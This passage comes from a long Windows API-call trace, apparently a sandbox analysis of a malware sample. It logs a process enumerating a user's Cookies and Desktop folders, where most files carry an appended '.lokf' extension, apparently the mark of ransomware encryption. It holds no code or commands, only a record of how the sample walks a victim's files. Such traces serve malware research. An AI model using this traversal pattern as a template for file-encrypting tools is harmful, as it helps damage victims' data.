ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x1ffa77b0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x5e4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="lulcit amkdfe.contact.lokf", cAlternateFileName="LULCIT~1.LOK")) returned 1 [0146.611] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaf1340, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x1ffcd910, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x5e2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sikvnb huvuib.contact.lokf", cAlternateFileName="SIKVNB~1.LOK")) returned 1 [0146.612] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaf1340, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x1ffcd910, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x5e2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sikvnb huvuib.contact.lokf", cAlternateFileName="SIKVNB~1.LOK")) returned 0 [0146.612] FindClose (in: hFindFile=0x3220d58 | out: hFindFile=0x3220d58) returned 1 [0146.612] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0146.612] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\") returned="Cookies\\" [0146.612] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0146.612] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0146.612] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0146.612] PathFindFileNameW (pszPath="") returned="" [0146.612] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaf1340, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x1ffcd910, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x5e2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sikvnb huvuib.contact.lokf", cAlternateFileName="SIKVNB~1.LOK")) returned 0xffffffff [0146.612] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0146.612] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="Desktop\\" [0146.612] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0146.612] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0146.612] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0146.612] PathFindFileNameW (pszPath="") returned="" [0146.612] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2035fa10, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x2035fa10, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3220d58 [0146.612] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2035fa10, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x2035fa10, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0146.613] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x89363db0, ftCreationTime.dwHighDateTime=0x1d4ce17, ftLastAccessTime.dwLowDateTime=0x953570b0, ftLastAccessTime.dwHighDateTime=0x1d4cca3, ftLastWriteTime.dwLowDateTime=0x1fff3a70, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x1855c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1jqP 8uN4qhj8sMm4.flv.lokf", cAlternateFileName="1JQP8U~1.LOK")) returned 1 [0146.613] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc40c02d0, ftCreationTime.dwHighDateTime=0x1d4c6ec, ftLastAccessTime.dwLowDateTime=0x4ad91180, ftLastAccessTime.dwHighDateTime=0x1d4cf9a, ftLastWriteTime.dwLowDateTime=0x1fff3a70, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0xdbde, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1Zw20eF9M7.mp4.lokf", cAlternateFileName="1ZW20E~1.LOK")) returned 1 [0146.613] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9e9b17e0, ftCreationTime.dwHighDateTime=0x1d4d455, ftLastAccessTime.dwLowDateTime=0x31724950, ftLastAccessTime.dwHighDateTime=0x1d4c7f7, ftLastWriteTime.dwLowDateTime=0x20019bd0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x3ac2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1zXBPnB.gif.lokf", cAlternateFileName="1ZXBPN~1.LOK")) returned 1 [0146.613] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd4cdc390, ftCreationTime.dwHighDateTime=0x1d4d3f5, ftLastAccessTime.dwLowDateTime=0xabb3d040, ftLastAccessTime.dwHighDateTime=0x1d4d499, ftLastWriteTime.dwLowDateTime=0x20019bd0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x97c2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="4UyQPASLT.wav.lokf", cAlternateFileName="4UYQPA~1.LOK")) returned 1 [0146.613] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1fa827e0, ftCreationTime.dwHighDateTime=0x1d4cff8, ftLastAccessTime.dwLowDateTime=0xb151e5d0, ftLastAccessTime.dwHighDateTime=0x1d4c55a, ftLastWriteTime.dwLowDateTime=0x2003fd30, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0xbedc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="5VDyYw1.m4a.lokf", cAlternateFileName="5VDYYW~1.LOK")) returned 1 [0146.613] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfb751d30, ftCreationTime.dwHighDateTime=0x1d4cb22, ftLastAccessTime.dwLowDateTime=0x93643bf0, ftLastAccessTime.dwHighDateTime=0x1d4d36e, ftLastWriteTime.dwLowDateTime=0x2003fd30, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x10e3f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="60uV9dxrIvRWJYpX2.pps.lokf", cAlternateFileName="60UV9D~1.LOK")) returned 1 [0146.613] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7b852ad0, ftCreationTime.dwHighDateTime=0x1d4c65d, ftLastAccessTime.dwLowDateTime=0xac0c5a10, ftLastAccessTime.dwHighDateTime=0x1d4c5ff, ftLastWriteTime.dwLowDateTime=0x20065e90, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0xa592, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="6NumCnon.pps.lokf", cAlternateFileName="6NUMCN~1.LOK")) returned 1 [0146.613] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0d06ee0, ftCreationTime.dwHighDateTime=0x1d4d402, ftLastAccessTime.dwLowDateTime=0x35623c00, ftLastAccessTime.dwHighDateTime=0x1d4d48b, ftLastWriteTime.dwLowDateTime=0x20065e90, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0xa5a2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8Ky0ltRrnhjM32N.png.lokf", cAlternateFileName="8KY0LT~1.LOK")) returned 1 [0146.613] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4bb8c420, ftCreationTime.dwHighDateTime=0x1d4cf8f, ftLastAccessTime.dwLowDateTime=0x808bf300, ftLastAccessTime.dwHighDateTime=0x1d4ce83, ftLastWriteTime.dwLowDateTime=0x2008bff0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0xaf53, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8XYY enP9O0YVVimx1.mp3.lokf", cAlternateFileName="8XYYEN~1.LOK")) returned 1 [0146.613] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcb9af730, ftCreationTime.dwHighDateTime=0x1d4d0ac, ftLastAccessTime.dwLowDateTime=0xa1b0df30, ftLastAccessTime.dwHighDateTime=0x1d4d1eb, ftLastWriteTime.dwLowDateTime=0x200b2150, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x1607a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="9Md r.swf.lokf", cAlternateFileName="9MDRSW~1.LOK")) returned 1 [0146.613] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x74880ca0, ftCreationTime.dwHighDateTime=0x1d4d28a, ftLastAccessTime.dwLowDateTime=0x172abcb0, ftLastAccessTime.dwHighDateTime=0x1d4d39d, ftLastWriteTime.dwLowDateTime=0x200b2150, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x1248b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="9REu6C.m4a.lokf", cAlternateFileName="9REU6C~1.LOK")) returned 1 [0146.613] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x384de1e0, ftCreationTime.dwHighDateTime=0x1d4cad5, ftLastAccessTime.dwLowDateTime=0x98131ff0, ftLastAccessTime.dwHighDateTime=0x1d4c576, ftLastWriteTime.dwLowDateTime=0x200d82b0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x6a0c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="aRT3ou.jpg.lokf", cAlternateFileName="ART3OU~1.LOK")) returned 1 [0146.613] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3b11c220, ftCreationTime.dwHighDateTime=0x1d4d570, ftLastAccessTime.dwLowDateTime=0xa72b1130, ftLastAccessTime.dwHighDateTime=0x1d4c65e, ftLastWriteTime.dwLowDateTime=0x200fe410, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0xf929, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bSgKDO2SM-AQU.mp3.lokf", cAlternateFileName="BSGKDO~1.LOK")) returned 1 [0146.613] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x92bd4f20, ftCreationTime.dwHighDateTime=0x1d4cc7f, ftLastAccessTime.dwLowDateTime=0x947af260, ftLastAccessTime.dwHighDateTime=0x1d4c755, ftLastWriteTime.dwLowDateTime=0x20124570, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x108f0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="cxkxIuDq.m4a.lokf", cAlternateFileName="CXKXIU~1.LOK")) returned 1 [0146.613] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0146.613] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x557a36c0, ftCreationTime.dwHighDateTime=0x1d4d2ea, ftLastAccessTime.dwLowDateTime=0xcaaf2bb0, ftLastAccessTime.dwHighDateTime=0x1d4d54e, ftLastWriteTime.dwLowDateTime=0x20124570, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x5974, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="faub8t.flv.lokf", cAlternateFileName="FAUB8T~1.LOK")) returned 1 [0146.613] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbaa128e0, ftCreationTime.dwHighDateTime=0x1d4c969, ftLastAccessTime.dwLowDateTime=0x54f95d30, ftLastAccessTime.dwHighDateTime=0x1d4cc77, ftLastWriteTime.dwLowDateTime=0x2014a6d0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0xc498, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="FhecmqmUmuGofO.jpg.lokf", cAlternateFileName="FHECMQ~1.LOK")) returned 1 [0146.613] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6564ae30, ftCreationTime.dwHighDateTime=0x1d4c674, ftLastAccessTime.dwLowDateTime=0x4d1e2720, ftLastAccessTime.dwHighDateTime=0x1d4c534, ftLastWriteTime.dwLowDateTime=0x20170830, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0xf65b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="FqC7oKr9X-T-xlLzFbdd.jpg.lokf", cAlternateFileName="FQC7OK~1.LOK")) returned 1 [0146.613] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8c601c50, ftCreationTime.dwHighDateTime=0x1d4d53c, ftLastAccessTime.dwLowDateTime=0xb3f380, ftLastAccessTime.dwHighDateTime=0x1d4c69f, ftLastWriteTime.dwLowDateTime=0x20170830, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0xbb22, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="gRPeD.m4a.lokf", cAlternateFileName="GRPEDM~1.LOK")) returned 1 [0146.613] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf479ec30, ftCreationTime.dwHighDateTime=0x1d4c998, ftLastAccessTime.dwLowDateTime=0x28ff8720, ftLastAccessTime.dwHighDateTime=0x1d4d06b, ftLastWriteTime.dwLowDateTime=0x20196990, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x1234e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="H 5zj6wBswdjjTMij-.mp3.lokf", cAlternateFileName="H5ZJ6W~1.LOK")) returned 1 [0146.613] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x88bab7e0, ftCreationTime.dwHighDateTime=0x1d4c83f, ftLastAccessTime.dwLowDateTime=0xedf42820, ftLastAccessTime.dwHighDateTime=0x1d4c8a4, ftLastWriteTime.dwLowDateTime=0x201bcaf0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0xc662, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="h5XCQ.mkv.lokf", cAlternateFileName="H5XCQM~1.LOK")) returned 1 [0146.613] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf9f64460, ftCreationTime.dwHighDateTime=0x1d4d280, ftLastAccessTime.dwLowDateTime=0x8c733cb0, ftLastAccessTime.dwHighDateTime=0x1d4cb58, ftLastWriteTime.dwLowDateTime=0x201bcaf0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x8ec, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="I9YVy1.mp3.lokf", cAlternateFileName="I9YVY1~1.LOK")) returned 1 [0146.613] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x150300c0, ftCreationTime.dwHighDateTime=0x1d4c8d3, ftLastAccessTime.dwLowDateTime=0xd492d060, ftLastAccessTime.dwHighDateTime=0x1d4d2d7, ftLastWriteTime.dwLowDateTime=0x201e2c50, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0xb0b2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IiDoDihC33qoyQYC.avi.lokf", cAlternateFileName="IIDODI~1.LOK")) returned 1 [0146.613] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcc4e13d0, ftCreationTime.dwHighDateTime=0x1d4c696, ftLastAccessTime.dwLowDateTime=0x7e00560, ftLastAccessTime.dwHighDateTime=0x1d4c922, ftLastWriteTime.dwLowDateTime=0x20208db0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x3e2e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="jJW2khyR pNShGfzK.flv.lokf", cAlternateFileName="JJW2KH~1.LOK")) returned 1 [0146.613] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70cf0f40, ftCreationTime.dwHighDateTime=0x1d4ca66, ftLastAccessTime.dwLowDateTime=0x62315280, ftLastAccessTime.dwHighDateTime=0x1d4c93b, ftLastWriteTime.dwLowDateTime=0x20208db0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x9773, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MKAZ57ez4L.mp3.lokf", cAlternateFileName="MKAZ57~1.LOK")) returned 1 [0146.613] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcebe94b0, ftCreationTime.dwHighDateTime=0x1d4d275, ftLastAccessTime.dwLowDateTime=0xdff02520, ftLastAccessTime.dwHighDateTime=0x1d4d2c3, ftLastWriteTime.dwLowDateTime=0x2022ef10, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0xb32d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NPYvWKI6z.rtf.lokf", cAlternateFileName="NPYVWK~1.LOK")) returned 1 [0146.613] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x46ed7210, ftCreationTime.dwHighDateTime=0x1d4d250, ftLastAccessTime.dwLowDateTime=0x20953110, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x20953110, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NxkfKpMd", cAlternateFileName="")) returned 1 [0146.613] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x38f90f90, ftCreationTime.dwHighDateTime=0x1d4ce02, ftLastAccessTime.dwLowDateTime=0x4ada5fa0, ftLastAccessTime.dwHighDateTime=0x1d4d340, ftLastWriteTime.dwLowDateTime=0x2022ef10, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x1ece, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="oQo1_q.jpg.lokf", cAlternateFileName="OQO1_Q~1.LOK")) returned 1 [0146.613] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78fa2ba0, ftCreationTime.dwHighDateTime=0x1d4cb6a, ftLastAccessTime.dwLowDateTime=0x4591d900, ftLastAccessTime.dwHighDateTime=0x1d4d0f8, ftLastWriteTime.dwLowDateTime=0x20255070, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x2203, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OvPRD3iWK.png.lokf", cAlternateFileName="OVPRD3~1.LOK")) returned 1 [0146.613] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3325580, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x3325580, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1689200, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0xb7e00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="penelop0611_2019-11-06_10-30.exe_.exe", cAlternateFileName="PENELO~1.EXE")) returned 1 [0146.613] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70223930, ftCreationTime.dwHighDateTime=0x1d4c59f, ftLastAccessTime.dwLowDateTime=0x3e9161e0, ftLastAccessTime.dwHighDateTime=0x1d4cb7e, ftLastWriteTime.dwLowDateTime=0x20255070, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x9862, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PxUe0Rd33Z0Hx10IeT1.avi.lokf", cAlternateFileName="PXUE0R~1.LOK")) returned 1 [0146.613] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2b199ca0, ftCreationTime.dwHighDateTime=0x1d4c95c, ftLastAccessTime.dwLowDateTime=0x28af6960, ftLastAccessTime.dwHighDateTime=0x1d4d22e, ftLastWriteTime.dwLowDateTime=0x2027b1d0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0xeade, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PYWZYi4ZS-zguXaIZa.m4a.lokf", cAlternateFileName="PYWZYI~1.LOK")) returned 1 [0146.614] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2005db70, ftCreationTime.dwHighDateTime=0x1d4c8a9, ftLastAccessTime.dwLowDateTime=0xf90a9030, ftLastAccessTime.dwHighDateTime=0x1d4cafe, ftLastWriteTime.dwLowDateTime=0x2027b1d0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0xdc04, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="P_559lEWKFJGdNawoW.jpg.lokf", cAlternateFileName="P_559L~1.LOK")) returned 1 [0146.614] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x64df4910, ftCreationTime.dwHighDateTime=0x1d4c599, ftLastAccessTime.dwLowDateTime=0x63d6a3f0, ftLastAccessTime.dwHighDateTime=0x1d4c59f, ftLastWriteTime.dwLowDateTime=0x202a1330, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x11b6d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="QXU6sWcq.flv.lokf", cAlternateFileName="QXU6SW~1.LOK")) returned 1 [0146.614] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78546840, ftCreationTime.dwHighDateTime=0x1d4c855, ftLastAccessTime.dwLowDateTime=0xc6db8660, ftLastAccessTime.dwHighDateTime=0x1d4d3f9, ftLastWriteTime.dwLowDateTime=0x202a1330, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x848a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RrXB-.m4a.lokf", cAlternateFileName="RRXB-M~1.LOK")) returned 1 [0146.614] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdeca1840, ftCreationTime.dwHighDateTime=0x1d4c729, ftLastAccessTime.dwLowDateTime=0x6ffe2130, ftLastAccessTime.dwHighDateTime=0x1d4d0e9, ftLastWriteTime.dwLowDateTime=0x202a1330, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x168d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SbEH25_9Y82gEZUNcsj.flv.lokf", cAlternateFileName="SBEH25~1.LOK")) returned 1 [0146.614] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe204e7f0, 